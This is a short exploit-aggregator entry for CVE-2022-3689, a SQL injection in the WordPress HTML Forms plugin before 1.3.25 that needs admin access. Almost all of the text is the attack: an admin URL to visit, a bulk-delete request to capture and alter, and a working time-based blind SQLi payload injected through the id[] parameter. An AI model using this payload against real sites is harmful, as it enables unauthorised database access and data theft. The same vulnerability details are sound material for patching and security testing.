Exploit for HTML Forms < 1.3.25 - Admin+ SQLi CVE-2022-3689

Name: Exploit for HTML Forms < 1.3.25 - Admin+ SQLi CVE-2022-3689
Rating: 5 (78 reviews)

2022-11-07 | CVSS 0.4

## https://sploitus.com/exploit?id=WPEX-ID:E9C551A3-7482-4421-8197-5886D028776C
Access the submission page on https://example.com/wp-admin/admin.php?page=html-forms&view=edit&form_id=form_ID&tab=submissions

Capture the request after performing a Move to Trash action, replace the Submission ID with the SQLi payload, e.g

_hf_admin_action=bulk_delete_submissions&_wpnonce=nonce&id[]=1) AND (SELECT 2179 FROM (SELECT(SLEEP(5)))xaXr) AND (4033=4033